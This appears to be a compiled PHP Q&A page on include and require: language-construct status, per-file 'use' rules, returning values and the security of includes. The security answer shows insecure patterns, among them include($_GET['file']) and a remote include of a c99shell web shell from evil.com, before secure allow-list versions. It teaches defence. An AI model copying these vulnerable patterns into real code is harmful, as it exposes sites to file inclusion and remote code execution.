Is PHP's 'Include' a Function or a Statement

Is php's 'include' a function or a statement?

Quoting from the manual (my emphasis)

Because include() is a special language construct, parentheses are not needed around its argument.

These are also called "special forms", and include such things as echo and return statements. Note that while none of these are functions, you can still speak of expressions and statements, the difference being the former have a value while the latter don't. Since include, include_once, require and require_once all return a value (TRUE if the include was successful), they can be used in expressions. By this reasoning, "include statement" would be incorrect, though includes are almost always used as statements.

Why can't 'use' statement be in include file?

The PHP manual is saying this:

The use keyword must be declared in the outermost scope of a file (the global scope) or inside namespace declarations. [...] Importing rules are per file basis, meaning included files will NOT inherit the parent file's importing rules.

The "Importing rules are per file basis" part being the important one here.

You can use PHPMailer\PHPMailer\PHPMailer in your include file, but that only means that PHPMailer (without having to specify the full class name) will be available inside your include file and not in the parent file (the one which includes your include file).

tl;dr

You need to specify your use ...; statements in every file you want that specific use to apply.

When should I use parenthesis in require/include statements?

You are allowed to use parentheses in 'include/require' not because include allows it itself but because you can use parentheses around any string or number in PHP for grouping.

So for example, "dog" is equivalent to ("dog"), ("dog")."dog" is equivalent to "dog"."dog", etc.

Parentheses become useful when you use complex expressions involving calculations and string concatenations but in such a simple case, they are simply allowed and perform an unnecessary and harmless "grouping" of a single string value.

PHP - Is include function secure?

It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

Insecure (Directory Traversal)

<?php 
include($_GET['file']);
?>

Insecure (URL fopen - If enabled)

<?php 
include('http://evil.com/c99shell.php');
?>

Insecure

<?php 
include('./some_dir/' . $_GET['file']);
?>

Partially Insecure ( *.php files are vulnerable )

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

Secure (Though not sure why anyone would do this.)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

Secure

<?php 
include('./includes/somefile.php');
?>

PHP include/require within a function

You can return data from included file into calling file via return statement.

include.php

return array("code" => "007", "name => "James Bond");

file.php

$result = include_once "include.php";
var_dump("result);

But you cannot call return $something; and have it as return statement within calling script. return works only within current scope.

EDIT:

I am looking to do this as I have lots
of functions in separate files and
they all have a large chunk of shared
code at the top.

In this case why don't you put this "shared code" into separate functions instead -- that will do the job nicely as one of the purposes of having functions is to reuse your code in different places without writing it again.

If an include() is conditional, will PHP include the file even if the condition is not met?

No, PHP will execute include in the moment the code fragment is reached.

This is quite important, because you can have php include file with code directly. E.g.

File1:

<?php echo "Foo"; ?>

File2:

<?php
  echo "Before";
  include("File1");
  echo "After";
?>

Sometimes your PHP processor won't even know at compiletime which file to include. Imagine something like include("File".mt_rand(1,10));. PHP won't know the filename to include up to the very moment it reaches the include statement.

Is it common to have just a return statement in a php file

No it isn't very common to have just a return statement, but it is used sometimes to store the configuration information in a separate config.php file so that the config can be included elsewhere with php require.

//config.php
<?php

return [
    'app_key' => 'SomeRandomString',
    'app_secret' => 'SomeRandomString',
]; 

// other-file.php
<?php

$config = require 'path/to/config.php';
$facebook = new Facebook($config['app_key'], $config['app_secret']);

Related Topics

How So I Convert This Sha256 + Base64 from Swift to PHP

Are PHP Associative Arrays Ordered

Using Value of a Column as Index in Results Using Pdo

Applied Coupons Disable Free Shipping Conditionally in Woocommerce

Check to See If a String Is Serialized

How to Execute Raw Queries with Laravel 5.1

How to Enable PHP to Work with Postgresql

How to Pass a JavaScript Array via Jquery Post So That All Its Contents Are Accessible via the PHP $_Post Array

Display Array Values in PHP

PHP Linefeeds (\N) Not Working

Preg_Match Equivalent in Swift

Replace Only First Match Using Preg_Replace

Permission Denied with Bash.Sh to Run Cron

Convert Number to Letter with PHP

How to Implode Array with Key and Value Without Foreach in PHP

Mysqli_Real_Connect(): (Hy000/2002): No Such File or Directory

Detecting Ajax in PHP and Making Sure Request Was from My Own Website

Wampserver PHPmyadmin Maximum Execution Time of 360 Seconds Exceeded


Leave a reply



Submit